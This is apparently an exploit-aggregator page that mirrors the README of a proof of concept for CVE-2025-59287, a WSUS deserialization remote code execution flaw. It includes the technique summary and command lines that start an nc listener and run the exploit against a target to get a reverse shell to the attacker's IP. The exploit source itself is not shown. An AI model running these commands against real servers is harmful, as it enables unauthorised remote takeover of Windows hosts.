CVE-2025-59287 PoC — Windows Server Update Service (WSUS) Remote Code Execution Vulnerability

Source

https://github.com/FurkanKAYAPINAR/CVE-2025-59287

Associated Vulnerability

Title:Windows Server Update Service (WSUS) Remote Code Execution Vulnerability (CVE-2025-59287)
Description:Deserialization of untrusted data in Windows Server Update Service allows an unauthorized attacker to execute code over a network.

Description

CVE-2025-59287

Readme

# CVE-2025-59287

WSUS CVE-2025-59287 – XML Deserialization RCE (Reverse Shell)
A focused PoC to exploit WSUS CVE-2025-59287 via XML deserialization to achieve a Windows reverse shell. This script only supports a reverse shell payload (no calc fallback).
Target: Windows Server with WSUS role
Technique: SOAP + ObjectDataProvider deserialization
Result: cmd.exe launches PowerShell reverse shell to your listener
Disclaimer
For authorized testing in lab environments only. You are responsible for complying with all applicable laws.
Requirements
Python 3.x
Network access to WSUS endpoints (usually 8530/8531)
Listener on your machine (e.g., nc)

# Start listener
nc -lvnp 4444

# Run exploit
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug

-u: WSUS base URL (http/https, typically port 8530/8531)
-l: Your IP to receive the shell
-p: Your listener port
--debug: Verbose output

File Snapshot


 [4.0K]  /data/pocs/cff6ca0c68635408429edbf8a2dfd1adeec34f06
├── [ 15K]  CVE-2025-59287.py
└── [ 911]  README.md

1 directory, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!